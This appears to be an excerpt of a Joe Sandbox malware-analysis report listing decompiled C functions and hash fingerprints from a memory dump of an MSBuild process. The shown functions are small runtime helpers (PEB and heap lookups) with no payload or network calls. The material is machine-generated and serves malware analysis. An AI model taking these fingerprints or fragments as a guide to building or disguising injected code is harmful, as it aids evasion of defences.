                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                            • Instruction ID: 2d912ed5159da7b3b69edd3c0bda50268ad637b9d37b0443a78519a72346e778
                                            • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                            • Instruction Fuzzy Hash: 2BE08C359046809BCF12EB48CA90F8EBBF5FB94B00F140044A4885BA60C624AC00CB00
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0101AAB0() {
                                            				intOrPtr* _t4;
                                            
                                            				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                            				if(_t4 != 0) {
                                            					if( *_t4 == 0) {
                                            						goto L1;
                                            					} else {
                                            						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                                            					}
                                            				} else {
                                            					L1:
                                            					return 0x7ffe0030;
                                            				}
                                            			}




                                            0x0101aab6
                                            0x0101aabb
                                            0x0106a442
                                            0x00000000
                                            0x0106a448
                                            0x0106a454
                                            0x0106a454
                                            0x0101aac1
                                            0x0101aac1
                                            0x0101aac6
                                            0x0101aac6

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                            • Instruction ID: b958c7eaa36f6bb867a609bff3498dc0a7960c25996f4e1ca034d2541f4f84c2
                                            • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                            • Instruction Fuzzy Hash: 92D0E935352A80CFD657DB1DC954B1577E8BB44B44FC504D0E541CB766E72CE944CA00
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E010335A1(void* __eax, void* __ebx, void* __ecx) {
                                            				void* _t6;
                                            				void* _t10;
                                            				void* _t11;
                                            
                                            				_t10 = __ecx;
                                            				_t6 = __eax;
                                            				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                                            					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                                            				}
                                            				if( *((char*)(_t11 - 0x1a)) != 0) {
                                            					return E0101EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                            				}
                                            				return _t6;
                                            			}






                                            0x010335a1
                                            0x010335a1
                                            0x010335a5
                                            0x010335ab
                                            0x010335ab
                                            0x010335b5
                                            0x00000000
                                            0x010335c1
                                            0x010335b7

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                            • Instruction ID: e02c075ede8086a257d232d9173690ae68751cc55e8f3cc2badf44c66eb34520
                                            • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                            • Instruction Fuzzy Hash: E0D0A9318011819AEB82AB14C2987ACBBBABB80208F5820A594C20E9D2C33A4A0AC600
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0100DB40() {
                                            				signed int* _t3;
                                            				void* _t5;
                                            
                                            				_t3 = L01024620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                                            				if(_t3 == 0) {
                                            					return 0;
                                            				} else {
                                            					 *_t3 =  *_t3 | 0x00000400;
                                            					return _t3;
                                            				}
                                            			}





                                            0x0100db4d
                                            0x0100db54
                                            0x0100db5f
                                            0x0100db56
                                            0x0100db56
                                            0x0100db5c
                                            0x0100db5c

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                            • Instruction ID: e98ed3c8c6975a3f8ae14a79c6f1819d4a7202e4e038dd67a7a825e4dc721a5d
                                            • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                            • Instruction Fuzzy Hash: 95C08C30280E01EAFB325F60CD01B403AA0BB10B01F4400A0A740DA0F4DBB8D801EA10
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0108A537(intOrPtr _a4, intOrPtr _a8) {
                                            
                                            				return L01028E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                                            			}



                                            0x0108a553

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                            • Instruction ID: 6d80e2d0d0e2b313155baa56d095b5cb372b6f42a662bde6ef634e48e0ac2a82
                                            • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                            • Instruction Fuzzy Hash: BAC01236080248BBCB126E81CC00F467B6AEBA4B60F008011FA480A5608632E970EA84
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E01023A1C(intOrPtr _a4) {
                                            				void* _t5;
                                            
                                            				return L01024620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                            			}




                                            0x01023a35

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                            • Instruction ID: 36c702f6ba0aef755944b08f38bdd14f25a933524a892f6b22314a2c11e9acd0
                                            • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                            • Instruction Fuzzy Hash: D7C08C32080248BBC722AE41DC00F017B29E7A4B60F000020FA040A5608572EC60D988
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0100AD30(intOrPtr _a4) {
                                            
                                            				return L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                            			}



                                            0x0100ad49

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                            • Instruction ID: 40c92f8eadbc4f016c302acaeb9a507652bad1372265bb064eb5da14f2223512
                                            • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                            • Instruction Fuzzy Hash: D1C08C32080248BBC7126A45CD00F017B29E7B0B60F000020F6040AA618932E860D588
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E010336CC(void* __ecx) {
                                            
                                            				if(__ecx > 0x7fffffff) {
                                            					return 0;
                                            				} else {
                                            					return L01024620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                            				}
                                            			}



                                            0x010336d2
                                            0x010336e8
                                            0x010336d4
                                            0x010336e5
                                            0x010336e5

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                            • Instruction ID: db516114aa857ee7999a2bcaa415a5c4df2b210c5ce8bd9c4e6c2c0bccde1e68
                                            • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                            • Instruction Fuzzy Hash: DBC02B74150440FFD7255F30CE40F147298F744A21F640394B220894F0D5689C00E500
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E010176E2(void* __ecx) {
                                            				void* _t5;
                                            
                                            				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                                            					return L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                            				}
                                            				return _t5;
                                            			}




                                            0x010176e4
                                            0x00000000
                                            0x010176f8
                                            0x010176fd

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                            • Instruction ID: 909429244c5063da853f13e0ba91c2b81bf3e49676668f4ba4f46813d24d7718
                                            • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                            • Instruction Fuzzy Hash: 77C08C701411805AEB2A570CCE30B203A90BB3C608F4805DCEA91098A2C36CA842C208
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E01027D50() {
                                            				intOrPtr* _t3;
                                            
                                            				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                            				if(_t3 != 0) {
                                            					return  *_t3;
                                            				} else {
                                            					return _t3;
                                            				}
                                            			}




                                            0x01027d56
                                            0x01027d5b
                                            0x01027d60
                                            0x01027d5d
                                            0x01027d5d
                                            0x01027d5d

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                            • Instruction ID: d2328a5a271690fd3b356545f9ae789fa173d2b30a0be98a10a5fda9b8ba3311
                                            • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                            • Instruction Fuzzy Hash: 31B092353019408FCE56EF28C080B1533F4BB44A40B8400D0E400CBA21D229E8008900
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E01032ACB() {
                                            				void* _t5;
                                            
                                            				return E0101EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                            			}




                                            0x01032adc

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                            • Instruction ID: 082addae60d83314a77788279de419fc4ca2fb045c61c96bea6daf345f2ce5b2
                                            • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                            • Instruction Fuzzy Hash: 30B01232C10441CFCF03EF40C650B5E7331FB40750F054490940127970C22CAC01CB40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5337c838005b20b31bfa0d4d1cda1d094040eb5701b4ff9f2a8d35d0953dd10f
                                            • Instruction ID: 9cd32feb5d8c2fd921a9e720c7a70144d49d5c8b1c9249968528cc3b8f3118a2
                                            • Opcode Fuzzy Hash: 5337c838005b20b31bfa0d4d1cda1d094040eb5701b4ff9f2a8d35d0953dd10f
                                            • Instruction Fuzzy Hash: 149002A120140903D281659988046070509E7D0342F51C012A6454555ECA698C917275
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ce9382a228188e447a4a9b98e0defb5ebda558f287ea4330c403b40d4f83e664
                                            • Instruction ID: 1fde8bb82c3efe9b56ab44faf104c6e3dda6f330dd964ac8c04dd511310d90fb
                                            • Opcode Fuzzy Hash: ce9382a228188e447a4a9b98e0defb5ebda558f287ea4330c403b40d4f83e664
                                            • Instruction Fuzzy Hash: 939002A121100543D245619984047070549E7E1241F51C013A6544554CC5698CA16265
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7cb4b6b0618cb01b6e2e599adbce76f5ba2d213fe29ec7cfbba5a584881628f2
                                            • Instruction ID: b009d0735b02171430746fc0ad2d8a2e2a5d88f8fadd191802d359737bf72d6b
                                            • Opcode Fuzzy Hash: 7cb4b6b0618cb01b6e2e599adbce76f5ba2d213fe29ec7cfbba5a584881628f2
                                            • Instruction Fuzzy Hash: 0F90027124100903D28271998404607050DF7D0281F91C013A4814554EC6958A96BBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e69dba8163c858810a8eb25857d8f9b80a1cce207ca0b2410f9243492db00a03
                                            • Instruction ID: 13d699943332496080c52cde72f413978f505a24a84502750a859eb43f3ecbef
                                            • Opcode Fuzzy Hash: e69dba8163c858810a8eb25857d8f9b80a1cce207ca0b2410f9243492db00a03
                                            • Instruction Fuzzy Hash: AA9002A1601145434681B19988044075519F7E1341391C122A4844560CC6A88895A3A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b63ce71b05d365d6a2a62b38977b556c5d48ff40662670b5f826e8c48221c05e
                                            • Instruction ID: c259702c86c9310b70777cbc8f49dd41227d568310df022dcaef066f92e70660
                                            • Opcode Fuzzy Hash: b63ce71b05d365d6a2a62b38977b556c5d48ff40662670b5f826e8c48221c05e
                                            • Instruction Fuzzy Hash: 4690026130100903D24361998414607050DE7D1385F91C013E5814555DC6658993B272
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d527a90b5902f28bdef5f5cb420bc142f405b1cc883d3b3ee70e3bc8e7786358
                                            • Instruction ID: a2b5fdc37d08a3bce388fb3797c8c4e77b1ea485607a2d93f9cd837d25f7b0e1
                                            • Opcode Fuzzy Hash: d527a90b5902f28bdef5f5cb420bc142f405b1cc883d3b3ee70e3bc8e7786358
                                            • Instruction Fuzzy Hash: C990026124100D03D2817199C414707050AE7D0641F51C012A4414554DC65689A577F1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 16e914e120f3dbf815e9aa6c6d833cb9dc8f6584f6707cef903322c784def20e
                                            • Instruction ID: 13cbf7651d6cd39fe0a546ce8562338ba181ea642b8bea14b9005c87101e11f6
                                            • Opcode Fuzzy Hash: 16e914e120f3dbf815e9aa6c6d833cb9dc8f6584f6707cef903322c784def20e
                                            • Instruction Fuzzy Hash: D490027120144503D2817199C44460B5509F7E0341F51C412E4815554CC6558896A361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a0f0f9bdb276138c12a43b652cb48679ffd284f709dd36af5f1d5d2715445bde
                                            • Instruction ID: 5f8eb8e92c5586274d6d5bddd9153147f2eec2a4ca62b201ca96961ab7b8c8d1
                                            • Opcode Fuzzy Hash: a0f0f9bdb276138c12a43b652cb48679ffd284f709dd36af5f1d5d2715445bde
                                            • Instruction Fuzzy Hash: FB90027120140903D241619988087470509E7D0342F51C012A9554555EC6A5C8D17671
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 35b79e37c92d78f7a66aa07cc29b1d165248b58fdc24afc2300713f57e0eb822
                                            • Instruction ID: 6bb47c3a5801f911239d93d3997e78e75f53fa507d9a929c20fd2097cda059ba
                                            • Opcode Fuzzy Hash: 35b79e37c92d78f7a66aa07cc29b1d165248b58fdc24afc2300713f57e0eb822
                                            • Instruction Fuzzy Hash: FF90026120144943D28162998804B0F4609E7E1242F91C01AA8546554CC95588956761
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: edbaf2c41b40f9b7cbaade25ab8317cd368be16eae6c685cbcf2e461e1c06c3a
                                            • Instruction ID: 2e078def8c9b349572f2fe03998154c11054e57c712c3545948014a015b80d83
                                            • Opcode Fuzzy Hash: edbaf2c41b40f9b7cbaade25ab8317cd368be16eae6c685cbcf2e461e1c06c3a
                                            • Instruction Fuzzy Hash: E49002E1201145934641A299C404B0B4A09E7E0241B51C017E5444560CC5658891A275
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c9b6b67c1c6de6801d0b862c0ff8ed28601568956b994038149cd764a101e0ea
                                            • Instruction ID: 627ee8496b2f185f6c19bc00b1758307f5fe30c4f9800eca2c2d87ca1902e0f3
                                            • Opcode Fuzzy Hash: c9b6b67c1c6de6801d0b862c0ff8ed28601568956b994038149cd764a101e0ea
                                            • Instruction Fuzzy Hash: 31900271A0500513928171998814647450AF7E0781B55C012A4904554CC9948A9563E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4cd232bc73f993059524da4ecfb97dde8b4573356886055c2536c5d91c8b777e
                                            • Instruction ID: 03fb9215c31457180455dbfa4731527119ac743eb386c1f07f4a2715b410f81a
                                            • Opcode Fuzzy Hash: 4cd232bc73f993059524da4ecfb97dde8b4573356886055c2536c5d91c8b777e
                                            • Instruction Fuzzy Hash: 81900265221005030286A599460450B0949F7D6391391C016F5806590CC66188A56361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5017b111e18fcab267a701cb53c214d77054146ad9a5aa3a7a093faa4eeb9bb1
                                            • Instruction ID: 3ed686f069ac667eafc0dc1c6a2bb69e80833efd7c82200990391c74c4b3f279
                                            • Opcode Fuzzy Hash: 5017b111e18fcab267a701cb53c214d77054146ad9a5aa3a7a093faa4eeb9bb1
                                            • Instruction Fuzzy Hash: 8490027120100D03D245619988046870509E7D0341F51C012AA414655ED6A588D17271
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 311d590ef16c0498a6f8b2d8b253540aebc7808dc72d03a8b6bb56356653557f
                                            • Instruction ID: 11d65f8c69fd51a052c24bed82c039a346f1c300b74f3e66089cf24f89000a5d
                                            • Opcode Fuzzy Hash: 311d590ef16c0498a6f8b2d8b253540aebc7808dc72d03a8b6bb56356653557f
                                            • Instruction Fuzzy Hash: 5A900271301005539641A6D99804A4B4609E7F0341B51D016A8404554CC59488A16261
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c741ca1c946640c66ddc9c769b106e5857d3f5d728a0cec31fd1fc5f5801b016
                                            • Instruction ID: 61b28a2f23d639a8ad055584e078c041f1f8906755cf423995d6121b1812e63b
                                            • Opcode Fuzzy Hash: c741ca1c946640c66ddc9c769b106e5857d3f5d728a0cec31fd1fc5f5801b016
                                            • Instruction Fuzzy Hash: 9490026160500903D281719994187070519E7D0241F51D012A4414554DC6998A9577E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 65bb4e1ff23387edfce8ddd031c06bf451271677ffdffc67673cb40e4f17d67e
                                            • Instruction ID: 2818842ec1f084e48fab7a1517d4359d569304a67161cf214a9427c06e3f5b0e
                                            • Opcode Fuzzy Hash: 65bb4e1ff23387edfce8ddd031c06bf451271677ffdffc67673cb40e4f17d67e
                                            • Instruction Fuzzy Hash: AF90027120100903D241619995087070509E7D0241F51D412A4814558DD69688917261
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 77f4bed0fb81eb983dceebdefc18bc16ef2f486dcf39a1a1fb59858803bafec0
                                            • Instruction ID: 1dd37c320deed9d9fcb49989d5f03adc1d022e29425018835df9669ee5e7c10e
                                            • Opcode Fuzzy Hash: 77f4bed0fb81eb983dceebdefc18bc16ef2f486dcf39a1a1fb59858803bafec0
                                            • Instruction Fuzzy Hash: 8B90026120504943D24165999408A070509E7D0245F51D012A5454595DC6758891B271
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 020fbcaebce92df020ce2677bdbdc58cb6f42a5692752bbb52bbe7eff4c04f71
                                            • Instruction ID: a6199c5b91a91cdff5a4a5f0734b2fb0f709551831361026fcd8f7bd9636feb4
                                            • Opcode Fuzzy Hash: 020fbcaebce92df020ce2677bdbdc58cb6f42a5692752bbb52bbe7eff4c04f71
                                            • Instruction Fuzzy Hash: 1090027520504943D64165999804A870509E7D0345F51D412A481459CDC69488A1B261
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c70a07d5ebf9807f1d5811a279b5d300af5e73d5514127961a8cafa4118062ca
                                            • Instruction ID: a4fb486695c3a6bee6c404fde70784a1d4f9d8efd06ce8b735cac5b375cb5da4
                                            • Opcode Fuzzy Hash: c70a07d5ebf9807f1d5811a279b5d300af5e73d5514127961a8cafa4118062ca
                                            • Instruction Fuzzy Hash: 7890027131114903D2516199C4047070509E7D1241F51C412A4C14558DC6D588D17262
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
